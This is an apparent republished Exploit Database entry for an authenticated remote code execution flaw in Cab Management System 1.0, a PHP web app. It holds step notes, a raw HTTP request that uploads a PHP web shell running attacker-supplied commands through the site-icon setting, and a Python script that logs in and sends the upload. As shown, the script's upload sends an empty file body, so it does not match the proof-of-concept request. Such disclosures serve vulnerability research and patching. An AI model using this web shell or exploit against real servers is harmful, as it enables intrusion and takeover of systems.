Cab Management System 1.0 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 14 阅读

• 作者： Alperen Ergel
  日期： 2022-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50769/

• # Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
  # Exploit Author: Alperen Ergel
  # Contact: @alpernae (IG/TW)
  # Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html
  # Version : 1.0
  # Tested on: windows 10 xammp | Kali linux
  # Category: WebApp
  # Google Dork: N/A
  # Date: 18.02.2022
  ######## Description ########
  #
  # 
  #Step 1: Login admin account and go settings of site
  #Step 2: Update web site icon and selecet a webshell.php
  #Step3 : Upload your webshell that's it...
  #
  ######## Proof of Concept ########
  
  ========>>> START REQUEST <<<=========
  
  POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1
  Host: localhost
  Content-Length: 11338
  sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
  Accept: */*
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Origin: http://localhost
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://localhost/cms/admin/?page=system_info
  Accept-Encoding: gzip, deflate
  Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml
  Connection: close
  
  
  <-- SNIPP HERE -->
  ------WebKitFormBoundaryc5vp1oayEolowCbb
  Content-Disposition: form-data; name="img"; filename="shell.php"
  Content-Type: application/octet-stream
  
  <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  ------WebKitFormBoundaryc5vp1oayEolowCbb
  Content-Disposition: form-data; name="cover"; filename=""
  Content-Type: application/octet-stream
  ------WebKitFormBoundaryc5vp1oayEolowCbb--
  <-- SNIPP HERE -->
  
  ========>>> END REQUEST <<<=========
  
  
  ========>>> EXPLOIT CODE <<<=========
  
  
  import requests
  print("""
  --------------------------------------------
  ||
  | Author: Alperen Ergel (@alpernae)|
  || 
  | CAB Management System v1 Exploit |
  ||
  --------------------------------------------
  """)
  username = input("Username: ")
  password = input("Password: ")
  URL = input("Domain: ")
  
  burp0_url = "http://" + URL + "/cms/classes/Login.php?f=login"
  burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://192.168.1.33", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://192.168.1.33/cms/admin/login.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
  burp0_data = {"username": username, "password": password}
  requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
  
  
  FILE = input("File: ")
  
  burp0_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings"
  burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://localhost", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost/cms/admin/?page=system_info", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
  burp0_data = "------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nCab Management System\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nCMS - PHP\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[welcome]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[about]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + FILE + "\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb--\r\n"
  requests.post(burp0_url, headers=burp0_headers, data=burp0_data)